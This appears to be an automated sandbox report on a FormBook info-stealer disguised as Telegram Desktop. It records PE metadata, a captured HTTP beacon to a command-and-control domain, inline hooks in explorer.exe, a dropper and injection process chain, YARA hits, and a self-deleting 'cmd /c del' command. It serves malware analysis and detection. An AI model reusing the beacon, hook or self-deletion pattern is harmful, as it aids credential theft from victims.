                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x6c5400x4b.text
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x6e0000x46f4.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x740000xc.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x20000x6a5940x6a600False0.982139578437data7.98710710749IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                      .rsrc0x6e0000x46f40x4800False0.181206597222data4.45766439274IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0x740000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                      Resources

                                                      NameRVASizeTypeLanguageCountry
                                                      RT_ICON0x6e1300x4028dBase III DBT, version number 0, next free block index 40
                                                      RT_GROUP_ICON0x721580x14data
                                                      RT_VERSION0x7216c0x39cdata
                                                      RT_MANIFEST0x725080x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                      Imports

                                                      DLLImport
                                                      mscoree.dll_CorExeMain

                                                      Version Infos

                                                      DescriptionData
                                                      Translation0x0000 0x04b0
                                                      LegalCopyrightCopyright (C) 2014-2021
                                                      Assembly Version2.7.4.0
                                                      InternalNameNew_1007572_021.exe
                                                      FileVersion2.7.4.0
                                                      CompanyNameTelegram FZ-LLC
                                                      LegalTrademarks
                                                      CommentsTelegram Desktop
                                                      ProductNameTelegram Desktop
                                                      ProductVersion2.7.4.0
                                                      FileDescriptionTelegram Desktop
                                                      OriginalFilenameNew_1007572_021.exe

                                                      Network Behavior

                                                      Snort IDS Alerts

                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                      08/03/21-19:50:15.399423TCP1201ATTACK-RESPONSES 403 Forbidden8049760185.53.178.50192.168.2.4

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Aug 3, 2021 19:50:15.349270105 CEST4976080192.168.2.4185.53.178.50
                                                      Aug 3, 2021 19:50:15.365813971 CEST8049760185.53.178.50192.168.2.4
                                                      Aug 3, 2021 19:50:15.366018057 CEST4976080192.168.2.4185.53.178.50
                                                      Aug 3, 2021 19:50:15.382523060 CEST8049760185.53.178.50192.168.2.4
                                                      Aug 3, 2021 19:50:15.382633924 CEST4976080192.168.2.4185.53.178.50
                                                      Aug 3, 2021 19:50:15.399370909 CEST8049760185.53.178.50192.168.2.4
                                                      Aug 3, 2021 19:50:15.399422884 CEST8049760185.53.178.50192.168.2.4
                                                      Aug 3, 2021 19:50:15.399449110 CEST8049760185.53.178.50192.168.2.4
                                                      Aug 3, 2021 19:50:15.399853945 CEST4976080192.168.2.4185.53.178.50
                                                      Aug 3, 2021 19:50:15.399990082 CEST4976080192.168.2.4185.53.178.50
                                                      Aug 3, 2021 19:50:15.416416883 CEST8049760185.53.178.50192.168.2.4

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Aug 3, 2021 19:48:11.287277937 CEST5453153192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:48:11.312505007 CEST53545318.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:48:11.646749973 CEST4971453192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:48:11.674344063 CEST53497148.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:48:12.411608934 CEST5802853192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:48:12.446872950 CEST53580288.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:48:12.730632067 CEST5309753192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:48:12.770869970 CEST53530978.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:48:13.400338888 CEST4925753192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:48:13.436501980 CEST53492578.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:48:14.382891893 CEST6238953192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:48:14.416975975 CEST53623898.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:48:15.471899986 CEST4991053192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:48:15.496669054 CEST53499108.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:48:16.402900934 CEST5585453192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:48:16.430919886 CEST53558548.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:48:17.192343950 CEST6454953192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:48:17.219954014 CEST53645498.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:48:18.285489082 CEST6315353192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:48:18.321301937 CEST53631538.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:48:19.212033987 CEST5299153192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:48:19.236999035 CEST53529918.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:48:20.024746895 CEST5370053192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:48:20.080260992 CEST53537008.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:48:20.851438046 CEST5172653192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:48:20.884269953 CEST53517268.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:48:21.737622976 CEST5679453192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:48:21.764936924 CEST53567948.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:48:22.957417011 CEST5653453192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:48:22.990452051 CEST53565348.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:48:23.796653986 CEST5662753192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:48:23.821459055 CEST53566278.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:48:24.635401011 CEST5662153192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:48:24.660094023 CEST53566218.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:48:25.416462898 CEST6311653192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:48:25.451778889 CEST53631168.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:48:26.146811008 CEST6407853192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:48:26.187503099 CEST53640788.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:48:26.889657974 CEST6480153192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:48:26.914860010 CEST53648018.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:48:42.516658068 CEST6172153192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:48:42.552501917 CEST53617218.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:49:03.866585016 CEST5125553192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:49:03.904426098 CEST53512558.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:49:04.029683113 CEST6152253192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:49:04.068367004 CEST53615228.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:49:04.593688011 CEST5233753192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:49:04.635272980 CEST53523378.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:49:05.538587093 CEST5504653192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:49:05.572464943 CEST53550468.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:49:05.932722092 CEST4961253192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:49:05.968030930 CEST53496128.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:49:06.440834045 CEST4928553192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:49:06.482620955 CEST53492858.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:49:07.755753994 CEST5060153192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:49:07.788120031 CEST53506018.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:49:08.429970980 CEST6087553192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:49:08.455038071 CEST53608758.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:49:09.285213947 CEST5644853192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:49:09.317590952 CEST53564488.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:49:10.636471987 CEST5917253192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:49:10.671652079 CEST53591728.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:49:11.716171026 CEST6242053192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:49:11.748574018 CEST53624208.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:49:12.524396896 CEST6057953192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:49:12.558231115 CEST53605798.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:49:20.701026917 CEST5018353192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:49:20.737951040 CEST53501838.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:49:50.337585926 CEST6153153192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:49:50.372936964 CEST53615318.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:49:51.853117943 CEST4922853192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:49:51.887586117 CEST53492288.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:50:15.298187971 CEST5979453192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:50:15.339657068 CEST53597948.8.8.8192.168.2.4

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                      Aug 3, 2021 19:50:15.298187971 CEST192.168.2.48.8.8.80x6317Standard query (0)www.comfsresidential.comA (IP address)IN (0x0001)

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                      Aug 3, 2021 19:50:15.339657068 CEST8.8.8.8192.168.2.40x6317No error (0)www.comfsresidential.com185.53.178.50A (IP address)IN (0x0001)

                                                      HTTP Request Dependency Graph

                                                      • www.comfsresidential.com

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      0192.168.2.449760185.53.178.5080C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Aug 3, 2021 19:50:15.382633924 CEST6717OUTGET /cg53/?y48=RnXd-dV8&04VdoL_=jL4gYOGdbdGLgCuh81HWgUyhq6g08d9KQ1n+auYX12/KRBTZXwpphFOeP1KBAJVgFN6h HTTP/1.1
                                                      Host: www.comfsresidential.com
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Aug 3, 2021 19:50:15.399422884 CEST6717INHTTP/1.1 403 Forbidden
                                                      Server: nginx
                                                      Date: Tue, 03 Aug 2021 17:50:15 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 146
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                      Code Manipulations

                                                      User Modules

                                                      Hook Summary

                                                      Function NameHook TypeActive in Processes
                                                      PeekMessageAINLINEexplorer.exe
                                                      PeekMessageWINLINEexplorer.exe
                                                      GetMessageWINLINEexplorer.exe
                                                      GetMessageAINLINEexplorer.exe

                                                      Processes

                                                      Process: explorer.exe, Module: user32.dll
                                                      Function NameHook TypeNew Data
                                                      PeekMessageAINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xEF
                                                      PeekMessageWINLINE0x48 0x8B 0xB8 0x84 0x4E 0xEF
                                                      GetMessageWINLINE0x48 0x8B 0xB8 0x84 0x4E 0xEF
                                                      GetMessageAINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xEF

                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      Analysis Process: New_1007572_021.exe PID: 6688 Parent PID: 5932

                                                      General

                                                      Start time:19:48:16
                                                      Start date:03/08/2021
                                                      Path:C:\Users\user\Desktop\New_1007572_021.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Users\user\Desktop\New_1007572_021.exe'
                                                      Imagebase:0x800000
                                                      File size:455168 bytes
                                                      MD5 hash:41137FD61B9CC0D92225C91660A5902C
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.739038576.0000000003BCD000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.739038576.0000000003BCD000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.739038576.0000000003BCD000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.739831969.0000000003EBC000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.739831969.0000000003EBC000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.739831969.0000000003EBC000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.739343756.0000000003D06000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.739343756.0000000003D06000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.739343756.0000000003D06000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:low

                                                      Chronological Activities

                                                      Analysis Process: New_1007572_021.exe PID: 6280 Parent PID: 6688

                                                      General

                                                      Start time:19:48:53
                                                      Start date:03/08/2021
                                                      Path:C:\Users\user\AppData\Local\Temp\New_1007572_021.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\AppData\Local\Temp\New_1007572_021.exe
                                                      Imagebase:0xb50000
                                                      File size:455168 bytes
                                                      MD5 hash:41137FD61B9CC0D92225C91660A5902C
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.740535210.0000000000404000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.740535210.0000000000404000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.740535210.0000000000404000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Antivirus matches:
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 28%, ReversingLabs
                                                      Reputation:low

                                                      Chronological Activities

                                                      Analysis Process: FB_5908.tmp.exe PID: 6340 Parent PID: 6280

                                                      General

                                                      Start time:19:48:55
                                                      Start date:03/08/2021
                                                      Path:C:\Users\user\AppData\Local\Temp\FB_5908.tmp.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Users\user\AppData\Local\Temp\FB_5908.tmp.exe'
                                                      Imagebase:0x400000
                                                      File size:3072 bytes
                                                      MD5 hash:74BAFB3E707C7B0C63938AC200F99C7F
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 5%, Metadefender, Browse
                                                      • Detection: 2%, ReversingLabs
                                                      Reputation:moderate

                                                      Chronological Activities

                                                      Analysis Process: FB_5E87.tmp.exe PID: 6344 Parent PID: 6280

                                                      General

                                                      Start time:19:48:55
                                                      Start date:03/08/2021
                                                      Path:C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe'
                                                      Imagebase:0x1080000
                                                      File size:186368 bytes
                                                      MD5 hash:48ECE2CA39A9EAE7FCED7418CF071D46
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.821846658.00000000012B0000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.821846658.00000000012B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.821846658.00000000012B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.821488799.0000000000E10000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.821488799.0000000000E10000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.821488799.0000000000E10000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.740219963.0000000001081000.00000020.00020000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.740219963.0000000001081000.00000020.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.740219963.0000000001081000.00000020.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe, Author: JPCERT/CC Incident Response Group
                                                      Antivirus matches:
                                                      • Detection: 100%, Avira
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 49%, Metadefender, Browse
                                                      • Detection: 86%, ReversingLabs
                                                      Reputation:low

                                                      Chronological Activities

                                                      Analysis Process: explorer.exe PID: 3424 Parent PID: 6344

                                                      General

                                                      Start time:19:48:57
                                                      Start date:03/08/2021
                                                      Path:C:\Windows\explorer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\Explorer.EXE
                                                      Imagebase:0x7ff6fee60000
                                                      File size:3933184 bytes
                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Chronological Activities

                                                      Analysis Process: cscript.exe PID: 6000 Parent PID: 3424

                                                      General

                                                      Start time:19:49:31
                                                      Start date:03/08/2021
                                                      Path:C:\Windows\SysWOW64\cscript.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\cscript.exe
                                                      Imagebase:0xe0000
                                                      File size:143360 bytes
                                                      MD5 hash:00D3041E47F99E48DD5FFFEDF60F6304
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.926228324.0000000004F0F000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.926228324.0000000004F0F000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.926228324.0000000004F0F000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.925005416.0000000000278000.00000004.00000020.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.925005416.0000000000278000.00000004.00000020.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.925005416.0000000000278000.00000004.00000020.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.925127682.0000000000490000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.925127682.0000000000490000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.925127682.0000000000490000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.926114786.0000000004BA0000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.926114786.0000000004BA0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.926114786.0000000004BA0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:moderate

                                                      Chronological Activities

                                                      Analysis Process: cmd.exe PID: 6872 Parent PID: 6000

                                                      General

                                                      Start time:19:49:34
                                                      Start date:03/08/2021
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:/c del 'C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe'
                                                      Imagebase:0x11d0000
                                                      File size:232960 bytes
                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Chronological Activities

                                                      Analysis Process: conhost.exe PID: 6756 Parent PID: 6872

                                                      General

                                                      Start time:19:49:35
                                                      Start date:03/08/2021
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff724c50000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Chronological Activities

                                                      Disassembly

                                                      Code Analysis

                                                      Reset < >

                                                        Analysis Process: New_1007572_021.exe PID: 6688 Parent PID: 5932 New_1007572_021.exeCOMMON

                                                        Executed Functions

                                                        Function 01097C30, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32 ref: 01097C90
                                                        • GetCurrentThread.KERNEL32 ref: 01097CCD
                                                        • GetCurrentProcess.KERNEL32 ref: 01097D0A
                                                        • GetCurrentThreadId.KERNEL32 ref: 01097D63
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.737624619.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: false
                                                        Similarity
                                                        • API ID: Current$ProcessThread
                                                        • String ID:
                                                        • API String ID: 2063062207-0
                                                        • Opcode ID: fa624b604246b10bd8622cf3dc454bd20c78902aaa2a2528c4355446b0084726
                                                        • Instruction ID: c650c0aeeb81c1e586e88d7fa4320216d66f997b719ea0533cf9a9bebe415d01
                                                        • Opcode Fuzzy Hash: fa624b604246b10bd8622cf3dc454bd20c78902aaa2a2528c4355446b0084726
                                                        • Instruction Fuzzy Hash: 7E5152B0D106488FDB14CFA9D948BAEBBF0AF48314F20846AE459B7350D7749945CF66
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0109B0A8, Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0109B2EE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.737624619.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: false
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: 3536320ae1fdef111f0cd0253aa74153e0b3b0ec7d9f806b2b871622cdea2b01
